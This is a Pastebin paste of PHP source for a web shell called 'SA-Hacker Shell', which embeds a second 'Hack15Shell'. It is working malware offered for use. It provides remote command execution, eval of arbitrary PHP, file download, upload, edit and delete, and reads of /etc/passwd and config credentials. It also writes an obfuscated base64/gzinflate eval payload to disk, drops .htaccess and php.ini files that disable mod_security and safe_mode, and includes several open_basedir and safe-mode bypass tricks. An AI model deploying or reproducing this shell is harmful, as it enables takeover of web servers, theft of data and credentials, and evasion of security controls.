GreyPhantom

SA-Hacker Shell

Nov 23rd, 2012
19,629
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 60.19 KB | None | 0 0
  1. <?php
  2.  
  3.  
  4. define( 'DS', DIRECTORY_SEPARATOR );
  5.  
  6. $ini_reconf = array(
  7.     'display_errors' => '0',
  8.     'disable_functions' => '',
  9.     'file_uploads' => 'On',
  10.     'max_execution_time' => '0',
  11.     'memory_limit' => '1024M',
  12.     'open_basedir' => '',
  13.     'safe_mode' => 'Off',
  14.     'sql.safe_mode' => 'Off',
  15.     'upload_max_filesize' => '1024M',
  16. );
  17.  
  18. foreach ($ini_reconf as $key => $value) {
  19.     @ini_set($key, $value);
  20. }
  21.  
  22. date_default_timezone_set('Asia/Ho_Chi_Minh');
  23.  
  24. function dectectos() {
  25.     $curos = strtoupper(substr(PHP_OS, 0, 3));
  26.     return $curos;
  27. }
  28.  
  29. //File download
  30. $fdownload=@$_GET['fdownload'];
  31. if ($fdownload != "" ){
  32.     if (file_exists($fdownload)) {
  33.         header('Content-Description: File Transfer');
  34.         header('Content-Type: application/octet-stream');
  35.         header('Content-Disposition: attachment; filename='.basename($fdownload));
  36.         header('Content-Transfer-Encoding: binary');
  37.         header('Expires: 0');
  38.         header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
  39.         header('Pragma: public');
  40.         header('Content-Length: ' . filesize($fdownload));
  41.         ob_clean();
  42.         flush();
  43.         readfile($fdownload);
  44.         exit;
  45.     }
  46. }
  47. //PHP Info
  48. function info()
  49. { ?>
  50.     <div align="center" id="phpinfo">
  51.     <?php
  52.     ob_start () ;
  53.     phpinfo () ;
  54.     $pinfo = ob_get_contents () ;
  55.     ob_end_clean () ;
  56.  
  57.     // the name attribute "module_Zend Optimizer" of an anker-tag is not xhtml valide, so replace it with "module_Zend_Optimizer"
  58.     echo ( str_replace ( "module_Zend Optimizer", "module_Zend_Optimizer", preg_replace ( '%^.*<body>(.*)</body>.*$%ms', '$1', $pinfo ) ) ) ;
  59.     ?>
  60.     </div>
  61. <?php
  62. }
  63.  
  64.  
  65. //File Manager
  66. function fileman()
  67. {
  68.  
  69.     function getmode($par) {
  70.         if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
  71.             return 'N/A';
  72.         } else {
  73.             $perms = fileperms($par);
  74.             if (($perms & 0xC000) == 0xC000) {
  75.                 // Socket
  76.                 $info = 's';
  77.             } elseif (($perms & 0xA000) == 0xA000) {
  78.                 // Symbolic Link
  79.                 $info = 'l';
  80.             } elseif (($perms & 0x8000) == 0x8000) {
  81.                 // Regular
  82.                 $info = '-';
  83.             } elseif (($perms & 0x6000) == 0x6000) {
  84.                 // Block special
  85.                 $info = 'b';
  86.             } elseif (($perms & 0x4000) == 0x4000) {
  87.                 // Directory
  88.                 $info = 'd';
  89.             } elseif (($perms & 0x2000) == 0x2000) {
  90.                 // Character special
  91.                 $info = 'c';
  92.             } elseif (($perms & 0x1000) == 0x1000) {
  93.                 // FIFO pipe
  94.                 $info = 'p';
  95.             } else {
  96.                 // Unknown
  97.                 $info = 'u';
  98.             }
  99.             // Owner
  100.             $info .= (($perms & 0x0100) ? 'r' : '-');
  101.             $info .= (($perms & 0x0080) ? 'w' : '-');
  102.             $info .= (($perms & 0x0040) ?
  103.             (($perms & 0x0800) ? 's' : 'x' ) :
  104.             (($perms & 0x0800) ? 'S' : '-'));
  105.             // Group
  106.             $info .= (($perms & 0x0020) ? 'r' : '-');
  107.             $info .= (($perms & 0x0010) ? 'w' : '-');
  108.             $info .= (($perms & 0x0008) ?
  109.             (($perms & 0x0400) ? 's' : 'x' ) :
  110.             (($perms & 0x0400) ? 'S' : '-'));
  111.             // World
  112.             $info .= (($perms & 0x0004) ? 'r' : '-');
  113.             $info .= (($perms & 0x0002) ? 'w' : '-');
  114.             $info .= (($perms & 0x0001) ?
  115.             (($perms & 0x0200) ? 't' : 'x' ) :
  116.             (($perms & 0x0200) ? 'T' : '-'));
  117.  
  118.             return $info;
  119.         }
  120.     }
  121.  
  122.     function getowner($par) {
  123.         if(function_exists('posix_getpwuid')) {
  124.             $owner = @posix_getpwuid(@fileowner($par));
  125.             return $owner['name'];
  126.         }
  127.     }
  128.  
  129.     function getgroup($par) {
  130.         if(function_exists('posix_getgrgid')) {
  131.             $group = @posix_getgrgid(@filegroup($par));
  132.             return $group['name'];
  133.         }
  134.     }
  135.  
  136.     function getsize($par) {
  137.         return @round(@filesize($par));
  138.     }
  139.  
  140.     function byteConvert(&$bytes){
  141.         $b = (int)$bytes;
  142.         $s = array('  B', 'KB', 'MB', 'GB', 'TB');
  143.         if($b < 0){
  144.             return "0 ".$s[0];
  145.         }
  146.         $con = 1024;
  147.         $e = (int)(log($b,$con));
  148.         return number_format($b/pow($con,$e),2,',','.').' '.$s[$e];
  149.     }
  150.  
  151.     $dir = realpath($_GET['dir']).DS;
  152.     $list = scandir($dir);
  153.  
  154.     echo '
  155.    <div align="center"><br>
  156.    <form action="" method="GET">
  157.        <input type="hidden" name="id" value="fm">
  158.        <input type="text" name="dir" size="80" value="',$dir,'" class="input">&nbsp;
  159.        <input type="submit" class="button" value=" Dir ">
  160.    </form>
  161.    </div>
  162.    <div align="center">
  163.    <table border="0" width="80%" cellspacing="1" cellpadding="2">
  164.        <tr>
  165.            <td width="180"><b><font size="2"> File / Folder Name </font></b></td>
  166.            <td width="30" align="center"><font color="#FFFF00" size="2"><b> Owner </b></font></td>
  167.            <td width="30" align="center"><font color="#FFFF00" size="2"><b> Group </b></font></td>
  168.            <td width="50" align="center"><font color="#FFFFFF" size="2"><b> &nbsp;&nbsp;&nbsp;Size </b></font></td>
  169.            <td width="30" align="center"><font color="#008000" size="2"><b> Download </b></font></td>
  170.            <td width="30" align="center"><font color="#FF9933" size="2"><b> Edit </b></font></td>
  171.            <td width="30" align="center"><font color="#999999" size="2"><b> Chmod </b></font></td>
  172.            <td width="30" align="center"><font color="#FF0000" size="2"><b> Delete </b></font></td>
  173.            <td width="150" align="center"><font color="#0080FF" size="2"><b> Last Modifed </b></font></td>
  174.        </tr>';
  175.  
  176. for($i=0; $i<count($list); $i++) {
  177.     if(@is_dir($dir.$list[$i])) {
  178.  
  179.         echo '
  180.        <tr>
  181.            <td><a href="?id=fm&dir=',$dir.$list[$i],'"><font color="#DD8008" size="2">',$list[$i],'</font></a></td>
  182.            <td align="center"><font color="#00CCFF" size="2">',getowner($dir.$list[$i]),'</font></td>
  183.            <td align="center"><font color="#00CCFF" size="2">',getgroup($dir.$list[$i]),'</font></td>
  184.            <td align="center"></td>
  185.            <td align="center"></td>
  186.            <td align="center"></td>
  187.            <td align="center"><a href="?id=fm&fchmod=',$dir.$list[$i],'"><font color="#999999" size="2">',getmode($dir.$list[$i]),'</font></a></td>
  188.            <td align="center"><a href="?id=fm&fdelete=',$dir.$list[$i],'"><font color="#FF0000" size="2"> Delete </font></a></td>
  189.            <td align="center"><font color="#FF9933" size="2" alt="DD-MM-YY">'.date ("d-m-y  H:i  P", filemtime($dir.$list[$i])).'</font></td>
  190.        </tr>';
  191.     }
  192. }
  193.  
  194. for($i=0; $i<count($list); $i++) {
  195.     if(@is_file($dir.$list[$i])) {
  196.  
  197.         echo '
  198.        <tr>
  199.            <td><a href="?id=fedit&fedit=',$dir.$list[$i],'"><font color="#FFFFFF" size="2">',$list[$i],'</font></a></td>
  200.            <td align="center"><font color="#00CCFF" size="2">',getowner($dir.$list[$i]),'</font></td>
  201.            <td align="center"><font color="#00CCFF" size="2">',getgroup($dir.$list[$i]),'</font></td>
  202.            <td align="right"><font color="#0080FF" size="2">',byteConvert(getsize($dir.$list[$i])),'</font></td>
  203.            <td align="center">';
  204.                     if (@is_readable($dir.$list[$i])){
  205.                         echo '<a href="?id=fm&fdownload=',$dir.$list[$i],'"><font size="2" color="#008000"> Download </font></a>';
  206.                     } else {
  207.                         echo '<font size="1" color="#FF0000"><b>Unreadable</b></font>';
  208.                     }
  209.             echo '</td>
  210.            <td align="center">';
  211.                     if (@is_readable($dir.$list[$i])){
  212.                         echo '<a href="?id=fedit&fedit=',$dir.$list[$i],'"><font size="2" color="#FF9933"> Edit </font></a>';
  213.                     } else {
  214.                         echo '<font size="1" color="#FF0000"><b>Unreadable</b></font>';
  215.                     }
  216.             echo '</td>
  217.            <td align="center"><a href="?id=fm&fchmod=',$dir.$list[$i],'"><font color="#999999" size="2">',getmode($dir.$list[$i]),'</font></a></td>
  218.            <td align="center"><a href="?id=fm&fdelete=',$dir.$list[$i],'"><font color="#FF0000" size="2"> Delete </font></a></td>
  219.            <td align="center"><font color="#FF9933" size="2" alt="DD-MM-YY">'.date ("d-m-y  H:i  P", filemtime($dir.$list[$i])).'</font></td>
  220.        </tr>';
  221.     }
  222. }
  223.  
  224.  
  225.     echo '
  226.        <tr>
  227.            <td valign="top" colspan="8">&nbsp;</td>
  228.        </tr>
  229.        <tr>
  230.            <td valign="top" colspan="8">
  231.                <form action="" method="GET">
  232.                <table align="left" width="100%">
  233.                    <tr>
  234.                        <td width="20%" class="td">File View / Edit:</td>
  235.                        <td width="80%">
  236.                            <input name="fedit" type="text" size="50" class="input" />&nbsp;
  237.                            <input type="hidden" name="id"  value="fedit">
  238.                            <input type="submit" value=" View / Edit " class="button" />
  239.                        </td>
  240.                    </tr>
  241.                </table>
  242.                </form>
  243.  
  244.                <form action="" method="GET">
  245.                <table align="left" width="100%">
  246.                    <tr>
  247.                        <td width="20%" class="td">File Download:</td>
  248.                        <td width="80%">
  249.                        <input name="fdownload" type="text" size="50" class="input" />&nbsp;
  250.                        <input type="submit" value=" Download " class="button" />
  251.                        </td>
  252.                    </tr>
  253.                </table>
  254.                </form>
  255.  
  256.                <form method="GET" action="">
  257.                <table align="left" width="100%">
  258.                    <tr>
  259.                        <td width="20%" class="td">Chmod:</td>
  260.                        <td width="80%">
  261.                        <input type="text" name="fchmod" size="50" class="input" />&nbsp;
  262.                        <input type="text" name="mode" size="3" class="input" />&nbsp;
  263.                        <input type="submit" value=" Change " class="button" />
  264.                        </td>
  265.                    </tr>
  266.                </table>
  267.                </form>
  268.  
  269.                <form enctype="multipart/form-data" action="" method="POST">
  270.                <table align="left" width="100%">
  271.                    <tr>
  272.                        <td width="20%" class="td">File Upload:</td>
  273.                        <td width="80%">
  274.                        <input name="userfile" type="file" size="50" class="file" />&nbsp;
  275.                        <input type="hidden" name="MAX_FILE_SIZE" value="300000"  />
  276.                        <input type="hidden" name="Fupath"  value="',$dir,'" />
  277.                        <input type="submit" value=" Upload " class="button" />
  278.                        </td>
  279.                    </tr>
  280.                </table>
  281.                </form>
  282.  
  283.                </div>
  284.            </td>
  285.        </tr>
  286.    </table>';
  287. }
  288.  
  289.  
  290. //Default
  291. function def()
  292. {
  293.     $id=$_GET['id'];
  294.     if (function_exists('posix_getpwuid') && function_exists('posix_geteuid')) {
  295.         $euserinfo  = @posix_getpwuid(@posix_geteuid());
  296.     }
  297.     if (function_exists('posix_getgrgid') && function_exists('posix_getegid')) {
  298.         $egroupinfo = @posix_getgrgid(@posix_getegid());
  299.     }
  300.     echo '
  301.    <p align="center" style="padding-left:20px;">
  302.  
  303.    </p>
  304.    <p align="left" style="padding-left:20px;">
  305.    <font color="#DD8008" size="2"><b>OS : ',php_uname(),'
  306.    <br>
  307.    SERVER IP : <font color="#FF0000">',gethostbyname($_SERVER['SERVER_NAME']),'</font><br>
  308.    SERVER NAME : <font color="#FF0000">',$_SERVER['SERVER_NAME'],'</font><br>
  309.    SERVER SOFTWARE : <font color="#FF0000">',$_SERVER['SERVER_SOFTWARE'],'</font><br>
  310.    SERVER ADMIN : <font color="#FF0000">',$_SERVER['SERVER_ADMIN'],'</font><br>
  311.        PHP VERSiON : <font color="#FF0000">',$ephpv = @phpversion(),'</font><br>
  312.    uid = ',$euserinfo['uid'],' ( ',$euserinfo['name'],' ) &nbsp;&nbsp;&nbsp;&nbsp; gid = ',$egroupinfo['gid'],' ( ',$egroupinfo['name'],' )<br>
  313.    </b></font></p>';
  314. }
  315.  
  316.  
  317. //Web Command
  318. function wcom ()
  319. {
  320.     $cmd=$_POST['cmd'];
  321.     $result=ex("$cmd");
  322.     echo '<center><br><h3> Run Command </h3></center>
  323.    <center>
  324.    <form method="POST" action="">
  325.    <input type="hidden" name="id" value="cmd" />
  326.    <input type="text" size="85" name="cmd" value="',$cmd,'" class="input" />&nbsp;
  327.    <input type="submit" class="button" value=" Run " />
  328.    </form><br>
  329.    <textarea rows=20 cols=85 class="textarea">',$result,'</textarea><br><br>';
  330. }
  331.  
  332.  
  333. //PHP Eval
  334. function eeval()
  335. {
  336.     $code=stripslashes($_POST['code']);
  337.     echo '<center><br><h3> PHP Code Evaluating </h3></center>
  338.    <center>
  339.    <form method="POST" action="">
  340.    <input type="hidden" name="id" value="eval">
  341.    <textarea name ="code" rows="10" cols="85" class="textarea">',$code,'mkDIR("file:");
  342. chdir("file:");
  343. mkDIR("etc");
  344. chdir("etc");
  345. mkDIR("passwd");
  346. chdir("..");
  347. chdir("..");
  348.  
  349. $ch = curl_init();
  350.  
  351. curl_setopt($ch, CURLOPT_URL, "file:file:///etc/passwd");
  352. curl_setopt($ch, CURLOPT_HEADER, 0);
  353.  
  354. curl_exec($ch);
  355.  
  356. curl_close($ch);</textarea><br><br>
  357.    <input type="submit" value=" Evaluate PHP Code" class="button"><hr>
  358.    </form>
  359.    <textarea rows="10" cols="85" class="textarea">';
  360.     eval($code);
  361.     echo '</textarea><br><br>';
  362. }
  363.  
  364.  
  365. //Php 5.2.9 Bypass
  366. function eizo()
  367. {
  368.  
  369. $kokdosya = "59.php";
  370.  
  371. $dosya_adi = "$kokdosya";
  372. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açilamadi!");
  373. $metin = "<? eval(gzinflate(base64_decode('
  374. hVRNb5tAED0Hif8wXaECcQJu1BwaA1GU2E0lN7Zs
  375. txfLQms8FijAInbt2Kny3zuA4zhW1F5gmI83b97O
  376. ch1417rmnupaum0/xvw8w2yOJYglrPN5yZN8uhBq
  377. lqPStVNX13QtWVqfMCvU1jLC793J1FwmKZoz2waj
  378. svx33o6uYSoRDouGg/FHVYfuTtUIo1iA6Q1H3cAr
  379. guH9EC6dC+cbSL7EMBMLhM8gCszDOZe4SEqYbwsu
  380. pTcvg//PQojeUpQZ5DxDn1UmAx6pROQ+i5UqrlzX
  381. dIxw3B397o6m7H4yGYb3RJHNnFhlqSwwSngaxbyU
  382. 1lva+Hb0YzgJH3Tt5meXzewDBBqA7H6PAEwGGapY
  383. LHxWCKlY4CV5sVKgtgVxUbhR7JUXycFAJs9kX7YZ
  384. rHm6ItP8gEOVahP0ezC5mmfJHo4yF1JtU3zeQ41j
  385. 8UQ1bqVAYNbC65qR4hpTv915PfAKPMRNIpW0alJX
  386. zLZ17SR7JOH3HkqP4iNHA9Vq1VDGngD4gJsipVO0
  387. mMvOmi2w6yRiYhmcmhvci8QqV9ZbmU3OVsv+Q60P
  388. VmofnhqcVqqKnhyzPk6CKmnH/yjWqULNIB9FDiY6
  389. edG1l4rzU0ytrCZyfm7DTgbHYc1MRhTTxNGqTMMk
  390. T5TVeOtviUoUNGMUn8Htr1F/QPtDrzNoRKwfrusy
  391. 50Ci3dXoDR4mcDvoD0Y+G3XvWABetTy8RA6leJI+
  392. +0o7E4mUrC8XbbY7X5Kmd9Mfd32/JoAbjKr29YEu
  393. ErTMYCzKcus4DvSoJfxj22AhUOYKGpFBlLAVK3KS
  394. K+ZrhALLLJGSbpV0zEPu4LmvVIm1W02yY1dzilIh
  395. sSa128hr+k/9BQ==
  396. '))); ?>";    
  397. fwrite ( $dosya , $metin ) ;
  398. fclose ($dosya);
  399.  
  400. }
  401.  
  402.  
  403. //Safe Modu Offla
  404. function epriv8()
  405. {
  406.  
  407. $kokdosya = ".htaccess";
  408.  
  409. $dosya_adi = "$kokdosya";
  410. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açilamadi!");
  411. $metin = "<IfModule mod_security.c>
  412.    Sec------Engine Off
  413.    Sec------ScanPOST Off
  414. </IfModule>";    
  415. fwrite ( $dosya , $metin ) ;
  416. fclose ($dosya);
  417.  
  418. $kokdosya = "php.ini";
  419.  
  420. $dosya_adi = "$kokdosya";
  421. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açilamadi!");
  422. $metin = "safe_mode          =       OFF
  423. disable_functions       =            NONE";    
  424. fwrite ( $dosya , $metin ) ;
  425. fclose ($dosya);
  426.  
  427.  
  428. }
  429.  
  430.  
  431. //Openbasedir Bypass
  432. function eobypass()
  433. {
  434.  
  435. ?>    
  436. <?
  437. /*###########################################
  438. NameScrip : Php hacker v1.0
  439. Private For Hack15 Members ..
  440. Coder By GeNiUs HaCkEr - Team Hack15
  441. WwW.Hack15.CoM      
  442. ###########################################*/
  443. error_reporting(0);
  444. set_magic_quotes_runtime(0);
  445. if(version_compare(phpversion(), '4.1.0') == -1)
  446.  {$_POST   = &$HTTP_POST_VARS;$_GET    = &$HTTP_GET_VARS;
  447.  $_SERVER = &$HTTP_SERVER_VARS;
  448.  }function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
  449. if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
  450. elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}
  451. else{return $requ."?".$link."=".$val;}}
  452. function delm($delmtxt){print"<center><table bgcolor=black style='border:1px solid #008080' width=99% height=2%>";print"<tr><td><b><center><font size=2 color=#008080>$delmtxt</td></tr></table></center>";}
  453. function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);
  454. $nscmd=htmlspecialchars($scmd);print $nscmd;}
  455. elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
  456. $ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
  457. elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
  458. while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
  459. print $res;}pclose($pcmd);}elseif(!function_exists(popen)){
  460. ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
  461. ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();
  462. print htmlspecialchars($pret);}}
  463. function input($type,$name,$value,$size)
  464. {if (empty($value)){print "<input type=$type name=$name size=$size>";}
  465. elseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";}
  466. elseif(empty($size)){print "<input type=$type name=$name value=$value >";}
  467. else {print "<input type=$type name=$name value=$value size=$size >";}}
  468. function permcol($path){if (is_writable($path)){print "<font color=#008080>";
  469. callperms($path); print "</font>";}
  470. elseif (!is_readable($path)&&!is_writable($path)){print "<font color=red>";
  471. callperms($path); print "</font>";}
  472. else {print "<font color=white>";callperms($path);}}
  473. if ($dlink=="dwld"){download($_REQUEST['dwld']);}
  474. function download($dwfile) {$size = filesize($dwfile);
  475. @header("Content-Type: application/force-download;name=$dwfile");
  476. @header("Content-Transfer-Encoding: binary");
  477. @header("Content-Length: $size");
  478. @header("Content-Disposition: attachment; filename=$dwfile");
  479. @header("Expires: 0");
  480. @header("Cache-Control: no-cache, must-revalidate");
  481. @header("Pragma: no-cache");
  482. @readfile($dwfile); exit;}
  483. ?>
  484. <html>
  485. <head><title>Hack15Shell</title></head>
  486. <style>
  487. BODY { SCROLLBAR-BASE-COLOR: #191919; SCROLLBAR-ARROW-COLOR: #008080; }
  488. a{color:#dadada;text-decoration:none;font-family:tahoma;font-size:13px}
  489. a:hover{color:#008080}
  490. input{FONT-WEIGHT:normal;background-color: #191919;font-size: 12px; color: #dadada; font-family: Tahoma; border: 1px solid #666666;height:17}
  491. textarea{background-color:#191919;color:#dadada;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1 solid #666666;}
  492. div{font-size:12px;font-family:tahoma;font-weight:normal;color:whitesmoke}
  493. select{background-color: #191919; font-size: 12px; color: #dadada; font-family: Tahoma; border: 1 solid #666666;font-weight:bold;}</style>
  494. <body bgcolor=black text=white><font face="sans ms" size=3>
  495. </body>
  496. </html>
  497. <?
  498. $nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
  499. $sf="<form method=post>";$ef="</form>";
  500. $st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
  501. $et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
  502. $c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
  503. $sta="<textarea cols=157 rows=23>";$eta="</textarea>";
  504. $sfnt="<font face=tahoma size=2 color=#008080>";$efnt="</font>";
  505. ################# Editing By User ########################
  506. ///////////////////////////////
  507.                              //
  508. $mysql_use = "no"; //"yes"   //
  509. $mhost = "localhost";        //
  510. $muser = "root";             //
  511. $mpass = "pass";             //
  512. $mdb = "name";               //
  513. $them = "xxx"; //any site    //
  514. $you = "xx"; //your username //
  515. $flib = "hack15.txt";        //
  516. $folder = "hack15.txt";      //
  517. ///////////////////////////////
  518. ################# PhP Design (Start) ########################
  519. delm(": Php Hacker v1.0 (Shell) :");
  520. print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<b><center><font face=tahoma color=white size=4>[ Php hacker v1.0 ]::[ Owned By Yourname ]
  521. </font></b></center>"; print"</td></tr>";print"</table>";print "<br>";
  522. print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";print "<a href=".inclink('linux', 'greet').">Gr33tz To</a>";
  523. print " - <a href='javascript:history.back()'>Back</a>";
  524. print "</td></tr></table>";
  525. echo "<br>";
  526. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  527. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  528. {
  529.  $safemode = true;
  530.  $hsafemode = "<font color=\"red\">ON (secure)</font>";
  531. }
  532. else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
  533. echo("Safe-mode: $hsafemode");
  534. print "</td></tr></table>";
  535. echo "<br>";
  536. ################# PhP Hacked ########################
  537. // read greet //
  538. if ($linux=='greet')
  539. {
  540. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  541. echo "GeNiUs HaCkEr & Blood Hacker & Mr.ALJoOoKeR & Dr_Whad_Drb & Saudi Hunter & Saudi Coder &  ROMANCY-HACKER & Qatil_Albasik & Caeser & KsA HaCkEr & Hacker Zero & Mr.Shares & Dr.Shares
  542. ";
  543.   echo "</textarea>";
  544. }
  545. // read file unzend sorce //
  546. if(empty($_POST['sorce'])){
  547. } else {
  548.  
  549. }
  550. // read file unzend functions //
  551.  if(empty($_POST['func'])){
  552. } else {
  553. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  554. $zeen=$_POST['func'];
  555. require("$zeen");
  556. echo "Database : ".$config['Database']['dbname']." <X> ";
  557. echo "UserName : ".$config['MasterServer']['username']." <X> ";
  558. echo "Password : ".$config['MasterServer']['password']." <X> ";
  559. echo "</textarea></p>";
  560. }// read file symlink ( ) //
  561. if(empty($_POST['sym'])){
  562. } else {
  563. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  564. $fp = fopen("hack15.txt","w+");
  565. fwrite($fp,"Php Hacker Was Here");
  566. @unlink($flib);
  567. $sym = "/home/" . $them . "/public_html/" . $k;
  568. $link = "/home/"  . $you . "/public_html/" . $folder . "/" . $flib;
  569. @symlink($sym, $link);
  570. if ($k{0} == "/") {
  571. echo "<script> window.location = '" . $flib . "'</script>";
  572. }else{
  573. echo "<pre><xmp>";
  574. echo readlink($flib) . "\n";
  575. echo "Filesize: " . linkinfo($flib) . "B\n\n";
  576. echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/"  . $folder . "/" . $flib);
  577.   echo "</textarea>";
  578. }
  579. }
  580.  
  581. // read file plugin ( ) //
  582. if(empty($_POST['plugin'])){
  583. } else {
  584. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  585. for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd
  586.  $ara = posix_getpwuid($uid);
  587.   if (!empty($ara)) {
  588.        while (list ($key, $val) = each($ara)){
  589.         print "$val:";
  590.   }
  591.   print "\n";
  592.      }
  593.   }
  594.   echo "</textarea>";
  595. }
  596. // read file id ( ) //
  597. if ($_POST['rid'] ){
  598. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  599.  for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd
  600. $ara = posix_getpwuid($uid);
  601.  if (!empty($ara)) {
  602. while (list ($key, $val) = each($ara)){
  603. print "$val:";
  604. }
  605.  print "\n";
  606. }
  607.  }
  608. echo "</textarea>";
  609. break;
  610.  
  611.  }
  612. // read file imap ( ) //
  613. $string = !empty($_POST['rimap']) ? $_POST['rimap'] : 0;
  614. if(empty($_POST['rimap'])){
  615. } else {
  616. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  617. $stream = imap_open($string, "", "");
  618. $str = imap_body($stream, 1);
  619. echo "</textarea>";
  620. }
  621. // read file Curl ( ) //
  622. if(empty($_POST['curl'])){
  623. } else {
  624. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  625. $m=$_POST['curl'];
  626. $ch =
  627. curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
  628. curl_exec($ch);
  629. var_dump(curl_exec($ch));
  630. echo "</textarea>";
  631. }
  632.  
  633. // read file SQL ( ) //
  634. if(empty($_POST['ssql'])){
  635. } else {
  636. echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
  637. $file=$_POST['ssql'];
  638.  
  639.  
  640. $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
  641. $mysql_files = explode(':', $mysql_files_str);
  642.  
  643. $sql = array (
  644. "USE $mdb",
  645. 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
  646. "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
  647. . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
  648. . "ESCAPED BY          '' "
  649. . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
  650.  
  651. "SELECT a FROM $tbl LIMIT 1"
  652. );
  653. mysql_connect ($mhost, $muser, $mpass);
  654.  
  655. foreach ($sql as $statement) {
  656.    $q = mysql_query ($statement);
  657.  
  658.    if ($q == false) die (
  659.       "FAILED: " . $statement . "\n" .
  660.       "REASON: " . mysql_error () . "\n"
  661.    );
  662.  
  663.    if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
  664.  
  665.    echo htmlspecialchars($r[0]);
  666.    mysql_free_result ($q);
  667. }
  668. echo "</textarea>";
  669. }
  670.  
  671.  
  672.  
  673. // read file copy & ini ( ) //
  674. if (isset ($_REQUEST['safefile'])){
  675. $file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){
  676. if(empty($_GET['file'])){if(empty($_POST['file'])){
  677. print "<center>[ Please choose a file first to read it using copy() ]</center>";
  678. } else {$file=$_POST['file'];}} else {$file=$_GET['file'];}}
  679. $temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){
  680. $zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));
  681. fclose($zrodlo);echo "<center><pre>".$sta.htmlspecialchars($tekst).$eta."</pre></center>";unlink($temp);} else {
  682. print "<FONT COLOR=\"RED\"><CENTER>Sorry, Can't read the selected file !!
  683. </CENTER></FONT><br>";}}if (isset ($_REQUEST['inifile'])){
  684. ini_restore("safe_mode");ini_restore("open_basedir");
  685. print "<center><pre>".$sta;
  686. if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."</pre></center>";}
  687. delm(": Safe mode bypass :");
  688. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  689. print "<tr><td width=50%><div align=left>";
  690. print $st.$c1."<div><b><center>Using copy() function</div>";
  691. print $ec.$c2.$sf."&nbsp;";
  692. input("text","safefile",$nscdir,75);
  693. input("hidden","scdir",$nscdir,0);print " ";
  694. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  695. print "</td><td height=20% width=50%><div align=right>";
  696. print $st.$c1."<div><b><center>Using ini_restore() function</div>";
  697. print $ec.$c2.$sf."&nbsp;";
  698. input("text","inifile",$nscdir,75);
  699. input("hidden","scdir",$nscdir,0);print " ";
  700. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  701. print "</td></tr></table>";
  702. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  703. print "<tr><td width=50%><div align=left>";
  704. print $st.$c1."<div><b><center>Using sql() function</div>";
  705. print $ec.$c2.$sf."&nbsp;";
  706. input("text","ssql",$nscdir,75);
  707. input("hidden","scdir",$nscdir,0);print " ";
  708. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  709. print "</td><td height=20% width=50%><div align=right>";
  710. print $st.$c1."<div><b><center>Using Curl() function</div>";
  711. print $ec.$c2.$sf."&nbsp;";
  712. input("text","curl",$nscdir,75);
  713. input("hidden","scdir",$nscdir,0);print " ";
  714. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  715. print "</td></tr></table>";
